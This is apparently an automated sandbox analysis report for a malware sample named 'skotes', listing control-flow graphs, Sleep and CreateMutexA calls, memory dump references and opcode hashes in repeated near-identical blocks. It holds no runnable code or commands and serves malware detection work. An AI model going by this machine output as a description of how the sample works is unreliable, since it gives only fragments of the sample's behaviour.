                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: a4f0a236acfe978a74d13d2ac2b623d3999481bbf4099adc5c15d7981a45700c
                                                                                                                                                                                                        • Instruction ID: e6412025afef37be64d439ea061db5414700c806c14cb9e44ec64a31b942ec07
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4f0a236acfe978a74d13d2ac2b623d3999481bbf4099adc5c15d7981a45700c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91312731B052099BEB18DB78DC89BADB766EBC6318F24861DE014973D1C77A99808B53

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 90 9ca1ae-9ca1ce 94 9ca1fc-9ca218 90->94 95 9ca1d0-9ca1dc 90->95 96 9ca21a-9ca226 94->96 97 9ca246-9ca265 94->97 98 9ca1de-9ca1ec 95->98 99 9ca1f2-9ca1f9 call 9dd663 95->99 100 9ca23c-9ca243 call 9dd663 96->100 101 9ca228-9ca236 96->101 102 9ca267-9ca273 97->102 103 9ca293-9ca916 call 9d80c0 97->103 98->99 104 9ca935 98->104 99->94 100->97 101->100 101->104 107 9ca289-9ca290 call 9dd663 102->107 108 9ca275-9ca283 102->108 110 9ca953-9ca994 Sleep CreateMutexA 104->110 111 9ca935 call 9f6c6a 104->111 107->103 108->104 108->107 119 9ca996-9ca998 110->119 120 9ca9a7-9ca9a8 110->120 111->110 119->120 122 9ca99a-9ca9a5 119->122 122->120
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 4c1d7995ae80d4ee8085110e5a50bc9a0463942e3771e999050b675d8661d2e6
                                                                                                                                                                                                        • Instruction ID: c7601ed4c6773791a4f1aff6a2d4e644cbbda1384a16b98ec9c9f95cbcf4aec2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1d7995ae80d4ee8085110e5a50bc9a0463942e3771e999050b675d8661d2e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB312831B052099BEB08DBB8DCCDFADB766ABC6318F24861DE014973D1C77A99808753

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 124 9ca418-9ca438 128 9ca43a-9ca446 124->128 129 9ca466-9ca482 124->129 130 9ca45c-9ca463 call 9dd663 128->130 131 9ca448-9ca456 128->131 132 9ca484-9ca490 129->132 133 9ca4b0-9ca4cf 129->133 130->129 131->130 134 9ca93f-9ca994 call 9f6c6a * 4 Sleep CreateMutexA 131->134 136 9ca4a6-9ca4ad call 9dd663 132->136 137 9ca492-9ca4a0 132->137 138 9ca4fd-9ca916 call 9d80c0 133->138 139 9ca4d1-9ca4dd 133->139 160 9ca996-9ca998 134->160 161 9ca9a7-9ca9a8 134->161 136->133 137->134 137->136 144 9ca4df-9ca4ed 139->144 145 9ca4f3-9ca4fa call 9dd663 139->145 144->134 144->145 145->138 160->161 162 9ca99a-9ca9a5 160->162 162->161
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 1dbc6c3b1a71ab151c858268450486ca0b0fb49a1f4c568e90ba3910a7a8791e
                                                                                                                                                                                                        • Instruction ID: 6efeb4a0fdbb2105cd12e514d3f50ce418ae76e7f052337eff73addad4499bf6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dbc6c3b1a71ab151c858268450486ca0b0fb49a1f4c568e90ba3910a7a8791e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5313931B002099BEB0C9B78DC8DFADB666EBD5318F20861DE054973E5C77989808763

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 164 9ca54d-9ca56d 168 9ca56f-9ca57b 164->168 169 9ca59b-9ca5b7 164->169 170 9ca57d-9ca58b 168->170 171 9ca591-9ca598 call 9dd663 168->171 172 9ca5b9-9ca5c5 169->172 173 9ca5e5-9ca604 169->173 170->171 176 9ca944-9ca994 call 9f6c6a * 3 Sleep CreateMutexA 170->176 171->169 178 9ca5db-9ca5e2 call 9dd663 172->178 179 9ca5c7-9ca5d5 172->179 174 9ca606-9ca612 173->174 175 9ca632-9ca916 call 9d80c0 173->175 180 9ca628-9ca62f call 9dd663 174->180 181 9ca614-9ca622 174->181 198 9ca996-9ca998 176->198 199 9ca9a7-9ca9a8 176->199 178->173 179->176 179->178 180->175 181->176 181->180 198->199 200 9ca99a-9ca9a5 198->200 200->199
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 8cb7396250e2b83ebc6432c19f328d01a6b505b6153406db2de451fd7f3895fb
                                                                                                                                                                                                        • Instruction ID: 21fa7562c5c51b35e69865148024342771ff5ed2f0b259c29e27335fc85b8c88
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cb7396250e2b83ebc6432c19f328d01a6b505b6153406db2de451fd7f3895fb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41312831F002498BEB08DB78DC89F6DB766EBC5328F24861DE054973D1C73989818B23

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
